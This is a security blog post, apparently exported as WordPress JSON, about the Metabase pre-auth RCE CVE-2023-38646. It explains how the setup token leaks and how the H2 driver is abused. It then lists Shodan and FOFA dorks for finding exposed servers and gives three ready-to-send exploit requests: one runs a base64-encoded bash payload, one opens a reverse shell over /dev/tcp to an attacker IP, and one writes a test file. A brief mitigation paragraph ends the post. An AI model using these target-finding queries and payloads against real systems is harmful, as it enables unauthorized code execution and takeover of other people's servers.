{"id":2920,"date":"2023-07-25T15:19:13","date_gmt":"2023-07-25T15:19:13","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=2920"},"modified":"2023-10-03T11:24:32","modified_gmt":"2023-10-03T11:24:32","slug":"metabase-rce-cve-2023-38646","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","title":{"rendered":"Metabase RCE: CVE-2023-38646"},"content":{"rendered":"<div class=\"c7f5092f831f91fb6af859cc3a8052cc\" data-index=\"4\" style=\"float: none; margin:10px 0 10px 0; text-align:center;\">\n<script async src=\"https:\/\/securepubads.g.doubleclick.net\/tag\/js\/gpt.js\"><\/script>\r\n<script>\r\n  window.googletag = window.googletag || {cmd: []};\r\n  googletag.cmd.push(function() {\r\n    googletag.defineSlot('\/22608490431\/iklan1', [[320, 100], [300, 50]], 'div-gpt-ad-1696178236578-0').addService(googletag.pubads());\r\n    googletag.pubads().enableSingleRequest();\r\n    googletag.enableServices();\r\n  });\r\n<\/script>\r\n<!-- \/22608490431\/iklan1 -->\r\n<div id='div-gpt-ad-1696178236578-0' style='min-width: 300px; min-height: 50px;'>\r\n  <script>\r\n    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1696178236578-0'); });\r\n  <\/script>\r\n<\/div>\n<\/div>\n\r\n<h3 class=\"wp-block-heading\">Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646<\/h3>\r\n\r\n\r\n\r\n<p><a href=\"https:\/\/secry.me\/explore\/news\/metabase-rce-cve-2023-38646\/\">CVE-2023-38646<\/a>, Metabase RCE: <a href=\"http:\/\/metabase.com\/\">Metabase<\/a> is a tools for business intelligence and data visualization thas has emerged as a preferred tool, seamlessly transforming data into insightful dashboards.<\/p>\r\n\r\n\r\n\r\n<p>However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the open-source variant and 1.46.6.1 for the Enterprise edition.<\/p>\r\n\r\n\r\n\r\n<p>This vulnerability, labeled as <strong>CVE-2023-38646<\/strong>, has the potential to expose servers to arbitrary command execution by attackers, sans authentication.<\/p>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">About the Vulnerability<\/h3>\r\n\r\n\r\n\r\n<p>According to AssetNote Blog, the point of the vulnerability resides within the Metabase API endpoint: `\/api\/setup\/validate`. This endpoint&#8217;s purpose is to validate database connections during the setup process. A setup token, generated upon Metabase initialization, is required to access this endpoint.<\/p>\r\n\r\n\r\n\r\n<p>This token was meant to aid in the completion of the initial setup and should ideally be used once. However, through meticulous analysis, researchers stumbled upon an unexpected twist &#8211; the setup token remained accessible even after the setup phase, creating a potential gateway for exploitation.<\/p>\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Metabase Remote Code Execution<\/h3>\r\n\r\n\r\n\r\n<p>Moving beyond the initial setup token exposure, researchers embarked on a journey towards achieving reliable remote code execution (RCE). The `\/api\/setup\/validate` endpoint accepted JDBC URIs, thereby opening avenues for exploitation through various database connectors.<\/p>\r\n\r\n\r\n\r\n<p>While attempts to exploit H2 database&#8217;s INIT parameter were initially hindered, ingenious maneuvering led researchers to an SQL injection vulnerability within the H2 database driver. This newfound vulnerability allowed for code execution without relying on the previously obstructed INIT parameter.<\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3>Dork to Find Targets using Metabase<\/h3>\r\n<p><strong>Shodan.io<\/strong><br \/>&#8211; http.html:Metabase<br \/>&#8211; http.title:Metabase (<em>twitter @win3zz<\/em>)<\/p>\r\n<p><strong>FOFA app <\/strong>(t<em>witter @HunterMapping<\/em>)<br \/>FOFA app=&#8221;Metabase&#8221;<br \/>Shodan product:&#8221;Metabase&#8221;<\/p>\r\n<p><strong>Twitter @fofabot<\/strong><br \/>FOFA Query: FOFA app=&#8221;Metabase&#8221; <br \/>Link: https:\/\/en.fofa.info\/result?qbase64=YXBwPSJNZXRhYmFzZSI%3D<\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Proof Of Concept for CVE-2023-38646<\/h3>\r\n\r\n\r\n\r\n<p>To exploit this vulnerability manually, you can following this simple step:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\">\r\n<li>Visit the \/api\/session\/properties , and get the token from &#8220;setup-token&#8221;<\/li>\r\n\r\n\r\n\r\n<li>You can use one of the three POST Requests below to reproduce the vulnerability I gathered from Twitter:<\/li>\r\n<\/ol>\r\n\r\n\r\n\r\n<p>Using sample H2 database is provided inside Metabase\u2019s JAR file: (recommended)<\/p>\r\n\r\n\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: \r\nContent-Type: application\/json\r\nContent-Length: 812\r\n\r\n{\r\n    \"token\": \"YOUR-TOKEN\",\r\n    \"details\":\r\n    {\r\n        \"is_on_demand\": false,\r\n        \"is_full_sync\": false,\r\n        \"is_sample\": false,\r\n        \"cache_ttl\": null,\r\n        \"refingerprint\": false,\r\n        \"auto_run_queries\": true,\r\n        \"schedules\":\r\n        {},\r\n        \"details\":\r\n        {\r\n            \"db\": \"zip:\/app\/metabase.jar!\/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$\/\/javascript\\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YOUR-BASE64}|{base64,-d}|{bash,-i}')\\n$$--=x\",\r\n            \"advanced-options\": false,\r\n            \"ssl\": true\r\n        },\r\n        \"name\": \"an-sec-research-team\",\r\n        \"engine\": \"h2\"\r\n    }\r\n}<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n<p>Using org.h2.driver, postgress<\/p>\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: localhost:3000\r\nContent-Length: 416\r\nAccept: application\/json\r\nContent-Type: application\/json\r\nUser-Agent: Mozilla\/5.0 \r\nConnection: close\r\n\r\n{\"token\":\"YOUR-TOKEN\",\"details\":{\"details\":{\r\n\"subprotocol\":\"h2\",\r\n\"classname\":\"org.h2.Driver\",\"advanced-options\":true,\r\n\"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\\\"sh\\\", \\\"-c\\\", cmd})\\\\;}$$\\\\;CALL SHELLEXEC('bash -i &gt;&amp;\/dev\/tcp\/IP-REVERSE\/1337 0&gt;&amp;1');\"},\"name\":\"x\",\"engine\":\"postgres\"}}\r\n<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n<p>Post Request 3: little bit similar with the first.<\/p>\r\n\r\n\r\n\r\n<pre class=\"wp-block-code\"><code>POST \/api\/setup\/validate HTTP\/1.1\r\nHost: localhost:3000\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nAccept-Language: en-US;q=0.9,en;q=0.8\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/115.0.5790.110 Safari\/537.36\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: application\/json\r\nContent-Length: 739\r\n\r\n{\r\n    \"token\": \"YOUR-TOKEN\",\r\n    \"details\":\r\n    {\r\n        \"is_on_demand\": false,\r\n        \"is_full_sync\": false,\r\n        \"is_sample\": false,\r\n        \"cache_ttl\": null,\r\n        \"refingerprint\": false,\r\n        \"auto_run_queries\": true,\r\n        \"schedules\":\r\n        {},\r\n        \"details\":\r\n        {\r\n            \"db\": \"zip:\/app\/metabase.jar!\/sample-database.db;MODE=MSSQLServer;\",\r\n            \"advanced-options\": false,\r\n            \"ssl\": true,\r\n\"init\": \"CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$\/\/javascript\\u000A\\u0009java.lang.Runtime.getRuntime().exec('touch \/tmp\/success')\\u000A$$\"\r\n        },\r\n        \"name\": \"an-sec-research-team\",\r\n        \"engine\": \"h2\"\r\n    }\r\n}<\/code><\/pre>\r\n\r\n\r\n\r\n\r\n\r\n<p><br \/><strong>Other poc<\/strong> you can learn from this blog: https:\/\/blog.calif.io\/p\/reproducing-cve-2023-38646-metabase . Or you can use this tools <a href=\"https:\/\/github.com\/robotmikhro\/CVE-2023-38646\/\">https:\/\/github.com\/robotmikhro\/CVE-2023-38646<\/a><\/p>\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">The Way Forward: Mitigation and Awareness<\/h3>\r\n\r\n\r\n\r\n<p>To address the CVE-2023-38646 vulnerability, Metabase released <a href=\"http:\/\/metabase.com\/blog\/security-advisory\">advisories<\/a> and versions that offer remedies. Upgrading to versions 0.46.6.1 (open-source) and 1.46.6.1 (Enterprise) is the primary step to safeguard against potential exploitation. For instances where immediate upgrade isn&#8217;t feasible, blocking requests to `\/api\/setup` endpoints and meticulous monitoring are recommended steps. Additional insights, mitigation strategies, and release information can be accessed through Metabase&#8217;s official advisories.<\/p>\r\n\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\r\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\">\u00a0<\/div>\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data visualization thas has emerged as a preferred tool, seamlessly transforming data into insightful dashboards. However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2954,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[194,131,195,201],"tags":[],"class_list":{"0":"post-2920","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security","8":"category-news","9":"category-tips-and-tricks","10":"category-tools"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Metabase RCE: CVE-2023-38646 | SECRY<\/title>\n<meta name=\"description\" content=\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Metabase RCE: CVE-2023-38646 | SECRY\" \/>\n<meta property=\"og:description\" content=\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-25T15:19:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-03T11:24:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secryweb.sirv.com\/WP_secry.me\/2023\/08\/CVE-Metabase-RCE.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\"},\"headline\":\"Metabase RCE: CVE-2023-38646\",\"datePublished\":\"2023-07-25T15:19:13+00:00\",\"dateModified\":\"2023-10-03T11:24:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"},\"wordCount\":477,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"articleSection\":[\"Cyber Security\",\"Hacker News\",\"Tips and Tricks\",\"Tools\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\",\"name\":\"Metabase RCE: CVE-2023-38646 | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"datePublished\":\"2023-07-25T15:19:13+00:00\",\"dateModified\":\"2023-10-03T11:24:32+00:00\",\"description\":\"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/CVE-Metabase-RCE.png\",\"width\":1280,\"height\":720,\"caption\":\"Metabase RCE (CVE-2023-38646)\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/metabase-rce-cve-2023-38646\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Metabase RCE: CVE-2023-38646\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Metabase RCE: CVE-2023-38646 | SECRY","description":"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","og_locale":"en_US","og_type":"article","og_title":"Metabase RCE: CVE-2023-38646 | SECRY","og_description":"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data","og_url":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2023-07-25T15:19:13+00:00","article_modified_time":"2023-10-03T11:24:32+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2023\/08\/CVE-Metabase-RCE.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f"},"headline":"Metabase RCE: CVE-2023-38646","datePublished":"2023-07-25T15:19:13+00:00","dateModified":"2023-10-03T11:24:32+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/"},"wordCount":477,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/CVE-Metabase-RCE.png","articleSection":["Cyber Security","Hacker News","Tips and Tricks","Tools"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","url":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/","name":"Metabase RCE: CVE-2023-38646 | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/CVE-Metabase-RCE.png","datePublished":"2023-07-25T15:19:13+00:00","dateModified":"2023-10-03T11:24:32+00:00","description":"Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646 CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/CVE-Metabase-RCE.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/08\/CVE-Metabase-RCE.png","width":1280,"height":720,"caption":"Metabase RCE (CVE-2023-38646)"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/metabase-rce-cve-2023-38646\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Metabase RCE: CVE-2023-38646"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=2920"}],"version-history":[{"count":27,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920\/revisions"}],"predecessor-version":[{"id":3439,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/2920\/revisions\/3439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/2954"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=2920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=2920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=2920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}